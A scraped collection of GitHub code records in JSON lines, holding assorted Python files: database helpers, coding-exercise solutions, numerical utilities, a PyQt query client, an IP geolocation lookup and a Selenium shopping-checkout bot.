self.cur.fetchall()\n self.cur.close()\n self.con.close()\n return self.sel\n\n def _insert(self,sql,args=None):\n self.ins = self.cur.executemany(sql,args)\n return self.ins\n\n def _update(self,sql, args=None):\n self.upd = self.cur.executemany(sql,args)\n return self.upd\n\n def _delete(self, sql, args=None):\n self.delete = self.cur.executemany(sql,args)\n return self.delete","repo_name":"Squirrel-Network/NebulaUserbot","sub_path":"database/db_connect.py","file_name":"db_connect.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"42831759851","text":"from PyQt5.QtCore import *\n\nfrom rawapi import new_raw_client, RawException\nimport threading\nfrom queue import Queue\n\nclass AsyncQueryClient(QObject):\n\n query_done = pyqtSignal(object, object)\n query_validated = pyqtSignal(object)\n error = pyqtSignal(str)\n\n def __init__(self, parent = None):\n super(AsyncQueryClient, self).__init__(parent)\n self.client = new_raw_client()\n self.run = True\n self.queue = Queue()\n self.thread = threading.Thread(name='Async query', target=self.loop, daemon=True)\n self.thread.start()\n self.executing_cmd = False\n\n def loop(self):\n while self.run:\n cmd = self.queue.get()\n self.executing_cmd = True\n try:\n if cmd['action'] == 'query':\n data, tipe = self.client.query(cmd['query'], with_type=True)\n self.query_done.emit(tipe, data)\n elif cmd['action'] == 'validate':\n data = self.client.query_validate(cmd['query'])\n print(data)\n self.query_validated.emit(data)\n else:\n raise Exception('Unexpected command %s' % cmd)\n except RawException as e:\n self.error.emit(str(e))\n except ConnectionError as e:\n self.error.emit(str(e))\n except Exception as e:\n print(e)\n raise e\n self.executing_cmd = False\n\n def query(self, query):\n cmd = dict(action='query', query=query)\n # If the queue does not have slot it will raise an Exception\n self.queue.put(cmd, block=False)\n\n def validate(self, query):\n cmd = dict(action='validate', query=query)\n # If the queue does not have slot it will raise an Exception\n self.queue.put(cmd, block=False)\n\n def stop(self):\n self.run = False\n","repo_name":"torcato/raw-qscintilla-editor","sub_path":"src/raw_editor/query_client.py","file_name":"query_client.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25999757353","text":"'''\nCall Center: Imagine you have a call center with three levels of employees:\nrespondent, manager, and director. An incoming telephone call must be first\n allocated to a respondent who is free. If the respondent can't handle the \n call, he or she must escalate the call to a manager. If the manager is not \n free or not able to handle it, then the call should be escalated to a \n director. Design the classes and data structures for this problem. \n Implement a method dispatchCall() which assigns a call to the first \n available employee. '''\n\nimport threading\n\nclass Call_Center:\n def __init__(self,name):\n self.__name = name\n self.__employees = []\n\n def main(self):\n a = input('Enter \"call\" to call: ')\n if a == 'call':\n self.dispatchCall()\n self.main()\n else:\n print('You entered an un-recognized command')\n self.main()\n\n def employ(self,fname,lname,title):\n if title == 'Respondent':\n self.__employees.append(Respondent(fname,lname,title))\n if title == 'Manager':\n self.__employees.append(Manager(fname,lname,title))\n if title == 'Director':\n self.__employees.append(Director(fname,lname,title))\n\n def dispatchCall(self):\n respondents = []\n managers = []\n directors = []\n full_status = []\n for i in self.__employees:\n if i.gettitle() == 'Respondent':\n respondents.append(i)\n if i.gettitle() == 'Manager':\n managers.append(i)\n if i.gettitle() == 'Director':\n directors.append(i)\n full_status.append(i.call_status())\n if False not in full_status:\n print('Please hold and the next available employee will get to you shortly!')\n timer = threading.Timer(10.0,self.dispatchCall)\n timer.start()\n search = True \n for i in respondents:\n if search == True and i.call_status() == False:\n i.assigncall()\n i.settimer(threading.Timer(15.0,i.endcall))\n i.starttimer()\n search = False\n print('Respondent,',i.fname(),i.lname(),'has been assigned the call!')\n for i in managers:\n if search == True and i.call_status() == False:\n i.assigncall()\n i.settimer(threading.Timer(15.0,i.endcall))\n i.starttimer()\n search = False\n print('Manager,',i.fname(),i.lname(),'has been assigned the call!')\n for i in directors:\n if search == True and i.call_status() == False:\n i.assigncall()\n i.settimer(threading.Timer(15.0,i.endcall))\n i.starttimer()\n search = False\n print('Director,',i.fname(),i.lname(),'has been assigned the call!')\n\nclass Employee:\n def __init__(self,fname,lname):\n self.__fname = fname\n self.__lname = lname\n self.__call_status = False\n self.__timer = None\n\n def assigncall(self):\n self.__call_status = True\n\n def endcall(self):\n self.__call_status = False\n print(self.__fname,self.__lname,'is available for call')\n\n def call_status(self):\n return self.__call_status\n\n def settimer(self,time):\n self.__timer = time\n\n def starttimer(self):\n self.__timer.start()\n\n def fname(self):\n return self.__fname\n\n def lname(self):\n return self.__lname\n\nclass Respondent(Employee):\n def __init__(self,fn,ln,t):\n self.__title = t\n Employee.__init__(self,fn,ln)\n\n def gettitle(self):\n return self.__title\n\nclass Manager(Employee):\n def __init__(self,fn,ln,t):\n self.__title = t\n Employee.__init__(self,fn,ln)\n\n def gettitle(self):\n return self.__title\n\nclass Director(Employee):\n def __init__(self,fn,ln,t):\n self.__title = t\n Employee.__init__(self,fn,ln)\n\n def gettitle(self):\n return self.__title\n\n#################################################################################\nCenter1 = Call_Center('Africell')\nCenter1.employ('Emmanuel','Olatunde','Director')\nCenter1.employ('Joseph','Scelera','Manager')\nCenter1.employ('Marco','Morazan','Manager')\nCenter1.employ('Femi','Adebonye','Respondent')\nCenter1.employ('Moses','Olatunde','Respondent')\nCenter1.employ('Gabriel','Olatunde','Respondent')\n\nCenter1.main()\n\n\n\n","repo_name":"Emanoid/Python-Repo","sub_path":"Call-Dispatch.py","file_name":"Call-Dispatch.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35137517946","text":"\"\"\"\n/* Turner Atwood\n * 10/12/20\n * A1 Paper [3.8] open.kattis.com/problems/a1paper\n * Greedy - take tape as needed, starting with the largest papers\n */\n\"\"\"\n\ndef main():\n dims = [2**(-3/4), 2**(-5/4)]\n # Input\n n = int(input())\n papers = [int(i) for i in input().split()]\n\n cost = 0\n needed = 2\n for i in range(n-1):\n cost = cost + (dims[i%2] * needed/2)\n dims[i%2] /= 2 # Cut the long side in half\n needed = 2 * (needed - min(papers[i], needed))\n if not needed:\n return cost\n return \"impossible\"\n\nif __name__ == \"__main__\":\n print(main())\n\n","repo_name":"TurnerAtwood/Kattis","sub_path":"Trivial/A1.py","file_name":"A1.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"21150039734","text":"class Solution:\n def isAdditiveNumber(self, num: str) -> bool:\n # Time Complexity: O(N^3)\n # Space Complexity: O(1)\n\n for end1 in range(len(num) - 1):\n for end2 in range(end1 + 1, len(num)):\n if (num[0] == '0' and end1 != 0) or (num[end1 + 1] == '0' and end2 != end1 + 1):\n continue\n\n first = int(num[:end1 + 1])\n second = int(num[end1 + 1:end2 + 1])\n found_third = False\n\n cur = end2 + 1\n\n while cur < len(num):\n next = first + second\n next_str = str(next)\n\n if len(next_str) > len(num) - cur or next_str != num[cur:cur + len(next_str)]:\n break\n\n first, second = second, next\n found_third = True\n cur += len(next_str)\n else:\n if found_third:\n return True\n\n return False\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/306. Additive Number/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"72606727787","text":"import os\nimport sys\nsys.path.append(\"src/\")\nimport pickle\nimport numpy as np\n\nfrom gnn import GraphNeuralNetwork\nfrom optimizer import Adam\nfrom train import read_train_data, read_test_data, train\n\n# 隣接行列を次数により正規化\ndef normalize(graph):\n deg = np.zeros_like(graph, dtype=float)\n for i in range(graph.shape[0]):\n graph[i][i] = 1\n deg[i][i] = 1 / np.sqrt(graph[i].sum())\n return np.dot(np.dot(deg, graph), deg)\n\nif __name__ == \"__main__\":\n train_data = np.array([(normalize(g), l) for g, l in read_train_data()])\n test_data = np.array([(normalize(g), l) for g, l in read_test_data()])\n\n for i in range(5):\n print(\"{}th model\".format(i))\n gnn = GraphNeuralNetwork(Adam())\n train(gnn, train_data, test_data, epoch_num=100)\n path_name = \"model/normalized_model{}.pickle\".format(i)\n os.makedirs(os.path.dirname(path_name), exist_ok=True)\n with open(path_name, mode=\"wb\") as f:\n pickle.dump(gnn, f)\n print(\"{} saved!\".format(path_name))","repo_name":"knshnb/PFN-task2019","sub_path":"src/kadai/kadai4-plus.py","file_name":"kadai4-plus.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"26251571095","text":"#Dog Age Calculator:\n#1-ask the user for the dog's name.\n# prompt the user to enter the dog's name,store in dog_name.\n#2-ask the user for the age of the dog in years.\n# prompt the user to enter the dog's age,store in dog_years.\n#3-Multiply the dog’s age by the number 7 to get \n# the dog’s age in human years.\n# human_years = dog_years x 7.\n\n#4-output dog's name and age in human years.\n#\n# example: Your dog, [name] is\n#[human_years] years old in human years.\n#\n#==============================================\n\ndog_name = input(\"What is your dog's name? \")\n#show dog's name\n#print(dog_name)\n\ndog_age = int(input(\"What is your dog's age? \"))\n#show dog's age dogs years\n#print(dog_age)\n\n# calculate the human years\nhuman_years = str(dog_age * 7)\n#human_years_string = str(human_years)\n\n\nprint(\"Your dog, \" + dog_name + \" is \" + human_years + \" years old in human years.\")\n","repo_name":"billoes/learntocode","sub_path":"ch2/dogagecalculator.py","file_name":"dogagecalculator.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25778970221","text":"import os\nimport numpy as np\nimport random\nfrom math import isclose\nfrom modelZoo.DyanOF import creatRealDictionary\nimport torch\nimport matplotlib.pyplot as plt\nfrom modelZoo.DyanOF import OFModel, fista\nfrom torch.autograd import Variable\nimport torch.nn\n\n\ndef gridRing(N):\n # epsilon_low = 0.25\n # epsilon_high = 0.15\n # rmin = (1 - epsilon_low)\n # rmax = (1 + epsilon_high)\n\n epsilon_low = 0.25\n epsilon_high = 0.15\n rmin = (1 - epsilon_low)\n rmax = (1 + epsilon_high)\n\n thetaMin = 0.001\n thetaMax = np.pi / 2 - 0.001\n delta = 0.001\n # Npole = int(N / 4)\n Npole = int(N/2)\n Pool = generateGridPoles(delta, rmin, rmax, thetaMin, thetaMax)\n M = len(Pool)\n\n idx = random.sample(range(0, M), Npole)\n P = Pool[idx]\n Pall = np.concatenate((P, -P, np.conjugate(P), np.conjugate(-P)), axis=0)\n\n return P, Pall\n\n\n## Generate the grid on poles\ndef generateGridPoles(delta, rmin, rmax, thetaMin, thetaMax):\n rmin2 = pow(rmin, 2)\n rmax2 = pow(rmax, 2)\n xv = np.arange(-rmax, rmax, delta)\n x, y = np.meshgrid(xv, xv, sparse=False)\n mask = np.logical_and(np.logical_and(x ** 2 + y ** 2 >= rmin2, x ** 2 + y ** 2 <= rmax2),\n np.logical_and(np.angle(x + 1j * y) >= thetaMin, np.angle(x + 1j * y) <= thetaMax))\n px = x[mask]\n py = y[mask]\n P = px + 1j * py\n\n return P\n\ndef plotting(input, reconstruction,key_frame, imageName, saveDir, seqNum):\n if seqNum > 1:\n\n seq1 = input[:, seqNum]\n seq2 = reconstruction[:, seqNum]\n y_key = -5 * np.ones(seq1.shape)\n else:\n seq1 = input\n seq2 = reconstruction\n y_key = -5 * np.ones(seq1.shape)\n\n y_key[key_frame,:] = seq1[key_frame,:]\n T = np.arange(0, input.shape[0],1)\n # plt.plot(T, seq1, 'b', T, seq2, 'r', T, y_key,'g*')\n plt.plot(T, seq1, 'b', label='gt')\n plt.plot(T, seq2, 'r', label='recover')\n plt.plot(T, y_key, 'g*', label='key frames')\n\n plt.legend()\n plt.title(imageName)\n plt.savefig(os.path.join(saveDir, imageName + '.png'))\n\ndef loadModel(ckpt_file, T, gpu_id):\n loadedcheckpoint = torch.load(ckpt_file, map_location=lambda storage, location: storage)\n #loadedcheckpoint = torch.load(ckpt_file)\n stateDict = loadedcheckpoint['state_dict']\n\n # load parameters\n Dtheta = stateDict['l1.theta']\n Drr = stateDict['l1.rr']\n model = OFModel(Drr, Dtheta, T, gpu_id)\n model.cuda(gpu_id)\n\n return model\n\ndef get_Dictionary(T, numPole, gpu_id, addOne):\n\n P, Pall = gridRing(numPole)\n # Drr = np.zeros(1)\n # Dtheta = np.zeros(1)\n # P = 0.625 + 1j * 0.773\n # print(P)\n Drr = abs(P)\n Drr = torch.from_numpy(Drr).float().cuda(gpu_id)\n Dtheta = np.angle(P)\n Dtheta = torch.from_numpy(Dtheta).float().cuda(gpu_id)\n\n WVar = []\n Wones = torch.ones(1).cuda(gpu_id)\n Wones = Variable(Wones, requires_grad=False)\n for i in range(0, T):\n W1 = torch.mul(torch.pow(Drr, i), torch.cos(i * Dtheta))\n\n W3 = torch.mul(torch.pow(Drr, i), torch.sin(i * Dtheta))\n if addOne:\n W = torch.cat((Wones, W1, W3), 0)\n else:\n W = torch.cat((W1, W3), 0)\n # W = torch.cat((W1, W3), 0)\n WVar.append(W.view(1, -1))\n dic = torch.cat((WVar), 0)\n G = torch.norm(dic, p=2, dim=0)\n idx = (G == 0).nonzero()\n nG = G.clone()\n nG[idx] = np.sqrt(T)\n G = nG\n\n dic = dic / G\n\n return dic\n\ndef get_recover(D, y, key_set):\n D_r = D[key_set, :]\n y_r = y[key_set, :]\n\n dtd_r = np.matmul(D_r, D_r.T)\n\n a = np.matmul(D_r.T, np.linalg.inv(dtd_r))\n coef_r = np.matmul(a, y_r)\n\n y_hat = np.matmul(D, coef_r)\n\n return y_hat\n\ndef get_recover_fista(D, y, key_set, gpu_id):\n if type(D) is np.ndarray:\n D = torch.Tensor(D)\n\n D_r = D[key_set]\n if len(y.shape)==3:\n y_r = y[:,key_set]\n else:\n y_r = y[key_set]\n\n # lam = 0.03\n\n if D.is_cuda:\n c_r = fista(D_r, y_r, 0.01, 100, gpu_id)\n y_hat = torch.matmul(D, c_r)\n else:\n c_r = fista(D_r.cuda(gpu_id), y_r, 0.01, 100, gpu_id)\n y_hat = torch.matmul(D.cuda(gpu_id), c_r)\n\n return y_hat\n\ndef getDictionary(ckpt_file, T, gpu_id):\n\n loadedcheckpoint = torch.load(ckpt_file, map_location=lambda storage, location: storage)\n stateDict = loadedcheckpoint['state_dict']\n\n Dtheta = stateDict['l1.theta'].cuda(gpu_id)\n Drr = stateDict['l1.rr'].cuda(gpu_id)\n Dictionary = creatRealDictionary(T, Drr, Dtheta, gpu_id)\n\n return Dictionary","repo_name":"Yuexiaoxi10/K-FPN-Old-project","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"10700654106","text":"from selenium import webdriver\nfrom EVGA.constants import *\nfrom selenium.webdriver.common.keys import Keys\nimport subprocess\nimport time\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\nclass EVGABot(webdriver.Chrome):\n def __init__(self, images=False, VPN_Connection=True, driver_path=DRIVER_PATH):\n option = webdriver.ChromeOptions()\n option.add_argument(PROFILE)\n option.add_experimental_option(\n \"excludeSwitches\", [\"enable-automation\"])\n option.add_experimental_option('useAutomationExtension', False)\n option.experimental_options[\"prefs\"] = chrome_prefs\n chrome_prefs[\"profile.default_content_settings\"] = {\"images\": 2}\n chrome_prefs[\"profile.managed_default_content_settings\"] = {\n \"images\": 2}\n if images:\n chrome_prefs[\"profile.default_content_settings\"] = {\"images\": 3}\n chrome_prefs[\"profile.managed_default_content_settings\"] = {\n \"images\": 3}\n\n if VPN_Connection:\n self.vpn = subprocess.Popen([VPN_PATH])\n time.sleep(3)\n\n super(EVGABot, self).__init__(driver_path, options=option)\n self.implicitly_wait(1000)\n\n def __exit__(self, *args):\n try:\n self.vpn.terminate()\n except:\n pass\n self.quit()\n\n def findItem(self):\n self.get(BASE_URL)\n try:\n WebDriverWait(self, 3).until(\n EC.presence_of_element_located((\n By.CSS_SELECTOR, f\"[title='Add {PRODUCT_ID} to cart']\"\n ))\n )\n return True\n except:\n self.refresh()\n try:\n WebDriverWait(self, 3).until(\n EC.presence_of_element_located((\n By.CLASS_NAME, 'text'\n ))\n )\n return False\n except:\n return None\n\n def waitThenClick(self, element):\n\n item = self.find_element_by_id(element)\n\n WebDriverWait(self, 30).until(\n EC.invisibility_of_element_located((\n By.CLASS_NAME, 'ajax-bg'\n ))\n )\n\n return item\n\n def script(self):\n try:\n\n self.find_element_by_css_selector(\n f\"[title='Add {PRODUCT_ID} to cart']\").click()\n self.find_element_by_id('LFrame_CheckoutButton').click()\n self.find_element_by_class_name('btnCheckoutContinue').click()\n self.find_element_by_id('cbAgree').click()\n self.find_element_by_id('rdoShipFee65').click()\n self.find_element_by_id('ctl00_LFrame_btncontinue').click()\n self.waitThenClick('rdoCreditCard').click()\n self.find_element_by_id('ctl00_LFrame_btncontinue').click()\n self.find_element_by_id(\n 'ctl00_LFrame_txtNameOnCard').send_keys(CARD_NAME)\n self.find_element_by_id(\n 'ctl00_LFrame_txtCardNumber').send_keys(CARD_NUMBER)\n\n element = self.find_element_by_id('ctl00_LFrame_ddlMonth')\n element.click()\n element = element.find_element_by_css_selector(\n f\"[value='{EXPIRY_MONTH}']\").click()\n\n element = self.find_element_by_id('ctl00_LFrame_ddlYear')\n element.click()\n element = element.find_element_by_css_selector(\n f\"[value='{EXPIRY_YEAR}']\").click()\n\n self.find_element_by_id('ctl00_LFrame_txtCvv').send_keys(CVV)\n self.find_element_by_id('ctl00_LFrame_ImageButton2').click()\n self.find_element_by_id('ctl00_LFrame_cbAgree').click()\n self.find_element_by_id('ctl00_LFrame_btncontinue').click()\n return True\n\n except Exception as e:\n print(e)\n return False\n","repo_name":"JeffreyLin39/evga-gpu-bot","sub_path":"EVGA/EVGABot.py","file_name":"EVGABot.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26671633265","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nCore of ip2loc\nNotice: no connection pool for the reason that tornado is signle thread\n\"\"\"\n\nimport ipaddress\nimport math\nimport logging\nimport sqlite3\nimport time\n\ntotal_len = 0\nmax_loops = 0\ntotal_len_update_time = 0\nTOTAL_LEN_UPDATE_INTERVAL = 5 * 60 # 5 min\n\n\ndef ip2int(ip: str) -> int:\n return int(ipaddress.IPv4Address(ip))\n\n\ndef update_data_length(conn: sqlite3.Connection) -> None:\n global total_len, max_loops, total_len_update_time\n\n if total_len and total_len_update_time and \\\n time.time() - total_len_update_time <= TOTAL_LEN_UPDATE_INTERVAL:\n return # use cache\n\n cursor = None\n # noinspection PyBroadException\n try:\n cursor = conn.cursor()\n sql = 'SELECT MAX(id) FROM ip2location'\n cursor.execute(sql)\n total_len = cursor.fetchone()[0] + 1\n max_loops = round(math.log2(total_len)) + 1\n total_len_update_time = time.time()\n logging.debug(f'update_data_length success, total_len: {total_len}, max_loops: {max_loops}')\n except Exception as e:\n logging.error(f'update_data_length error: {e}', exc_info=True)\n if not total_len:\n raise e\n finally:\n if cursor:\n cursor.close()\n\n\ndef ip2loc(conn: sqlite3.Connection, ip: str) -> dict:\n \"\"\" IPV4 to geo location implementation\n Using binary search\n \"\"\"\n update_data_length(conn)\n int_ip = ip2int(ip)\n cursor = None\n # noinspection PyBroadException\n try:\n cursor = conn.cursor()\n start, end = 0, total_len\n\n for _ in range(max_loops):\n idx = (start + end) // 2\n sql = f'SELECT id, ip_from, ip_to, country_code, country_name, region_name, city_name, latitude, longitude'\\\n f' FROM ip2location WHERE id={idx}'\n cursor.execute(sql)\n ret = cursor.fetchone()\n ip_from, ip_to = ret[1], ret[2]\n if ip_from <= int_ip <= ip_to:\n return {\n 'ip': ip,\n 'country_code': ret[3],\n 'country_name': ret[4],\n 'region_name': ret[5],\n 'city_name': ret[6],\n 'latitude': ret[7],\n 'longitude': ret[8],\n }\n if int_ip < ip_from:\n end = idx - 1\n continue\n elif int_ip > ip_to:\n start = idx + 1\n else:\n # Though I think this would never happen here,\n # carefully using 'max_loops' is better here than just 'while True'\n raise Exception(f\"'{ip}' exceeds max loops {max_loops}!\")\n except Exception as e:\n logging.error(f'ip2loc error: {e}, ip: {ip}', exc_info=True)\n return {}\n finally:\n if cursor:\n cursor.close()\n","repo_name":"ZhenningLang/ip2loc-server","sub_path":"src/ip2loc_server/ip2loc.py","file_name":"ip2loc.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24157965527","text":"from tkinter import ttk\nimport re\n\nfrom tkcolorpicker import colorpicker\n\n\nclass ColorPicker(colorpicker.ColorPicker):\n \"\"\"Color picker dialog.\"\"\"\n\n def __init__(self, parent=None, color=None, alpha=False,\n title=\"Color Chooser\"):\n self._prefix = True\n try:\n match = re.match(r\"^(#?)[0-9A-Fa-f]{6}$\", color)\n if not match.groups()[0]:\n color = '#' + color\n self._prefix = False\n except (TypeError, AttributeError):\n color = '#FF0000'\n self._prefix = True\n colorpicker.ColorPicker.__init__(self, parent, color, alpha, title)\n\n # --- validation\n button_frame = self.grid_slaves(4, 0)[0]\n b_ok, b_close = button_frame.pack_slaves()\n b_close.configure(text='Close')\n b_ok.pack_forget()\n b_ok.pack(side=\"right\", padx=10)\n ttk.Button(button_frame, text=\"Insert\",\n command=self.insert).pack(side=\"right\", padx=10)\n self.grab_release()\n self.bind('', lambda e: self.destroy())\n\n def insert(self):\n rgb, hsv, hexa = self.square.get()\n if self.alpha_channel:\n hexa = self.hexa.get()\n rgb += (self.alpha.get(),)\n self.color = rgb, hsv, hexa\n self.event_generate(\"<>\")\n\n def get_color(self):\n if self._prefix:\n # return HTML format with leading #\n return self.color[2]\n else:\n # return HTML format without leading #\n return self.color[2][1:]\n\n def ok(self):\n self.insert()\n self.destroy()\n","repo_name":"j4321/PyTkEditor","sub_path":"pytkeditorlib/dialogs/colorpicker.py","file_name":"colorpicker.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"15019266276","text":"from collections import defaultdict\nfrom string import ascii_uppercase\n\n\nblub = iter(ascii_uppercase)\n\n\ndef findMFD(input_str):\n \n digrams = defaultdict(int)\n for i in range(1,len(input_str)):\n last_char = input_str[i-1]\n c_char = input_str[i]\n digrams[last_char + c_char] += 1\n return sorted(digrams.items(),key=lambda x: x[1], reverse=True)[0]\n\n\ndef replaceMFD(digram, input_str, non_terminal):\n return input_str.replace(digram, non_terminal)\n\n\ndef repair(input_str):\n mfd, freq = findMFD(input_str)\n rules = []\n while freq > 1:\n nt = next(blub)\n input_str = replaceMFD(mfd, input_str, nt)\n rules.append(f'{nt}-->{mfd}')\n mfd, freq = findMFD(input_str)\n nt = next(blub)\n rules.append(f'{nt}-->{input_str}')\n return ','.join(rules)\n\n\ndef decompress(rules):\n rules = rules.split(',')\n s = rules[-1].split('-->')[1]\n for rule in rules[::-1]:\n nt, digram = rule.split('-->')\n s = s.replace(nt, digram)\n return s\n\n\nif __name__ == '__main__':\n test_str = 'abcabcbc'\n erg = repair(test_str)\n print(erg)\n decomp = decompress(erg)\n print(decomp)","repo_name":"frederikpietzko/DBIS","sub_path":"string_rePair.py","file_name":"string_rePair.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9477473378","text":"import numpy as np\n\n\nclass MatrixMethods:\n\n @classmethod\n def _shape_checker(cls,A: np.ndarray, b: np.ndarray) -> None:\n try:\n if A.shape[0] != A.shape[1]:\n raise ValueError(\"A must be a square matrix\")\n except IndexError:\n raise ValueError(\"A must be a 2D matrix\")\n try:\n _ = b.shape[1]\n raise ValueError(\"b must be a column vector\")\n except IndexError:\n pass\n return\n \n \n def lu(self) -> tuple[np.ndarray, np.ndarray]:\n '''Gotten from https://johnfoster.pge.utexas.edu/numerical-methods-book/LinearAlgebra_LU.html'''\n #Get the number of rows\n n = self.A.shape[0]\n\n U = np.zeros((n, n), dtype=np.double)\n L = np.eye(n, dtype=np.double)\n\n #Loop over rows\n for k in range(n):\n U[k, k:] = self.A[k, k:] - L[k,:k] @ U[:k,k:]\n L[(k+1):,k] = (self.A[(k+1):,k] - L[(k+1):,:] @ U[:,k]) / U[k, k]\n \n return L, U\n \n \n def __init__(self,A: np.ndarray, b: np.ndarray):\n self._shape_checker(A, b)\n self.A = A\n self.b = b\n self.L = np.tril(A) # upper triangular matrix\n self.U = np.triu(A, 1) # lower triangular matrix\n \n \n def __str__(self):\n return self.__class__.__name__\n \n \n def LU_decompose(self) -> np.ndarray:\n L, U = self.lu()\n l_inv = np.linalg.inv(L)\n u_inv = np.linalg.inv(U)\n #Solve Ly = b.\n y = np.dot(l_inv, self.b)\n #Solve Ux = y.\n x = np.dot(u_inv, y)\n return x\n\n \n def cholesky_decomposition(self) -> np.ndarray:\n ''' Solving A = GG^T'''\n G = np.linalg.cholesky(self.A)\n g_inv = np.linalg.inv(G)\n g_trans = np.transpose(G)\n g_trans_inv = np.linalg.inv(g_trans)\n #Solve Gy = b.\n y = np.dot(g_inv, self.b)\n #Solve G^Tx = y.\n x = np.dot(g_trans_inv, y)\n return x\n \n \n def gauss_seidel(self, initial_guess: np.ndarray, n: int) -> np.ndarray:\n x = [initial_guess]\n l_inv = np.linalg.inv(self.L)\n for i in range(n):\n solution = np.dot(l_inv,(self.b - np.dot(self.U ,x[i])))\n x.append(solution)\n return x[-1]\n \n \n def true_solution(self) -> np.ndarray:\n return np.dot(np.linalg.inv(self.A), self.b)\n \n \n @staticmethod\n def eigen_estimates(A: np.ndarray) -> list[tuple]:\n MatrixMethods._shape_checker(A, b= np.array([0]))\n out = []\n n = A.shape[0]\n for i in range(n):\n row_sum = 0\n for j in range(n):\n if i==j:\n lhs = A[i][i]\n else:\n row_sum += abs(A[i][j])\n upper_bound = row_sum + lhs\n lower_bound = lhs - row_sum\n out.append((lower_bound, upper_bound))\n return out","repo_name":"Chinedu-E/Mathematical-Modelling","sub_path":"Code/matrix_computations.py","file_name":"matrix_computations.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9076224978","text":"on = 'S'\n\nwhile on == 'S':\n operating_1 = float(input('Digite um operando: '))\n operating_2 = float(input('Digite outro operando: '))\n operator = input('Digite o operador: ')\n\n if operator == '+':\n print(f'O resultado da soma é: {operating_1 + operating_2:.2f}')\n elif operator == '-':\n print(f'O resultado da subtração é: {operating_1 - operating_2:.2f}')\n elif operator == '*':\n print(\n f'O resultado da multiplicação é: {operating_1 * operating_2:.2f}')\n elif operator == '/':\n if operating_2 == 0.0:\n print('Não é possível realizar divisão por zero!')\n else:\n print(f'O resultado da divisão é: {operating_1 / operating_2:.2f}')\n\n on = input('Deseja realizar mais operações? (S/N): ')\n","repo_name":"ErnestoTSantos/CursoPythonCodar.me","sub_path":"ControleFluxo/Exercicios_Controle_Fluxo/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8654562095","text":"#!/usr/bin/python3\n\n\"\"\"\nGather data from an API\n\"\"\"\n\nimport requests\nfrom sys import argv\n\n\nAPI_URL = \"https://jsonplaceholder.typicode.com\"\n\nif __name__ == \"__main__\":\n userInfo = requests.get(\"{}/users/{}\".format(API_URL, argv[1])).json()\n taskToDo = requests.get(\"{}/todos?userId={}\".\n format(API_URL, argv[1])).json()\n completedTask = []\n for task in taskToDo:\n if task[\"completed\"]:\n completedTask.append(task['title'])\n\n print(\"Employee {} is done with tasks({}/{}):\".\n format(userInfo['name'], len(completedTask), len(taskToDo)))\n\n print(\"\\n\".join(\"\\t {}\".format(task) for task in completedTask))\n","repo_name":"Camaltra/holberton-system_engineering-devops","sub_path":"0x15-api/0-gather_data_from_an_API.py","file_name":"0-gather_data_from_an_API.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69947815469","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 5 16:55:48 2021\n\n@author: hihyun\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 5 15:37:37 2021\n\n@author: hihyun\n\"\"\"\n#prefix먼저\nfrom collections import defaultdict\nclass Node:\n def __init__(self,length={}):\n self.length=defaultdict(list)\n self.children={}\nclass Trie:\n def __init__(self):\n self.head=Node()\n def insert(self,r_string):\n cur_node=self.head\n r_\n cur_node.length[length].append() #for ?????\n for i in string:\n if i not in cur_node.children:\n cur_node.children[i]=Node()\n cur_node.children[i].length[length]+=1\n cur_node=cur_node.children[i]\n \n def search(self,string,length):\n l=length\n cur_node=self.head\n count=0\n for i in string:\n if i not in cur_node.children:\n return 0\n cur_node=cur_node.children[i]\n if l in cur_node.length:\n count=cur_node.length[length]\n return count\ndef solution(user_id, banned_id):\n post=Trie()\n pre=Trie()\n \n for i in banned_id:\n post.insert(i[::-1])\n pre.insert(i)\n\n answer=[]\n for i in banned_id:\n if i[0]=='?':\n\n answer.append(post.search(i[::-1].replace('?',''),len(i)))\n else:\n answer.append(pre.search(i.replace('?',''),len(i)))\n\n return answer\n \n 